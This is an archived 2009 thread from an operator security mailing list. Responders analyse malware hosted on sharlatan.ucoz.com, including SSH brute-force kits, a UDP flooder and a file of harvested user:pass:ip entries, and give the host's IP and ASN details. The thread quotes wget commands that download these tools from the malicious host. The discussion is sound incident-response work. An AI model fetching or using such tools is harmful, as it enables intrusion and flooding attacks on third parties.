[nsp-sec] possible malware on sharlatan.ucoz.com

Smith, Donald Donald.Smith at qwest.com
Mon Jul 6 16:36:03 EDT 2009



(coffee != sleep) & (!coffee == sleep)
Donald.Smith at qwest.com gcia   

> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net 
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of 
> SURFcert - Peter
> Sent: Thursday, July 02, 2009 2:12 PM
> To: Rob Thomas
> Cc: NSP-SEC List
> Subject: Re: [nsp-sec] possible malware on sharlatan.ucoz.com
> 
> ----------- nsp-security Confidential --------
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Rob Thomas wrote on 2009-07-02 19:53:
> 
> >> wget sharlatan.ucoz.com/spaniol.tar
Ssh bruteforce tools including a scanner, unix (bash exec),  results and a 10MB dictionary.
A couple of scripts to help automate the whole thing.
It appears to date back to 2006/2007.
The vuln.txt dates back to Jan 2 2007 so probably isn't worth notifying customers.
It does include user:pass:ip_addr.


> >> wget sharlatan.ucoz.com/udp.pl
UDP flooder written shell.

> >> wget sharlatan.ucoz.com/udp.plw
I couldn't retrive that one.

> > 
> > sharlatan.ucoz.com (ha what a name!) presently resolves to
> > 208.100.61.101 for me.
> 
> I see the same IP address at my end of the world.
> 
> > AS      | IP               | BGP Prefix          | CC | Registry |
> > Allocated  | AS Name
> > 32748   | 208.100.61.101   | 208.100.32.0/19     | US | arin     |
> > 2006-02-17 | STEADFAST - NoZone, Inc.
> > 
> > We see 208.100.61.101 hosting malware as far back as 
> 2009-01-01 01:31:56
> > UTC (I didn't go back to 2008).  It's also sourced spam and hosted
> > several phishing sites.
> > 
> > We see quite a few DNS RRs pointed to 208.100.61.101 last month.
> 
> So a connectino to that site might indicate compromised 
> systems? I hope
> not. I checked the flows to see if somebody else downloaded 
> the malware.
> they didn't seem to but there where a whole lot of systems 
> just dying to
> get some data.
> 
> - --
> Peter Peters
> SURFcert Officer on Duty
> cert at surfnet.nl                            http://cert.surfnet.nl/
> office-hours: +31 302 305 305    emergency (24/7): +31 622 923 564
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> 
> iD8DBQFKTRSCelLo80lrIdIRAsRgAKCqf/uxzJTVfFa4Kuzxe48rGtYtawCdHVXX
> 26bBURzIDKEqzq1On/xLOWY=
> =p1f4
> -----END PGP SIGNATURE-----
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the 
> nsp-security
> community. Confidentiality is essential for effective 
> Internet security counter-measures.
> _______________________________________________
> 
> 


More information about the nsp-security mailing list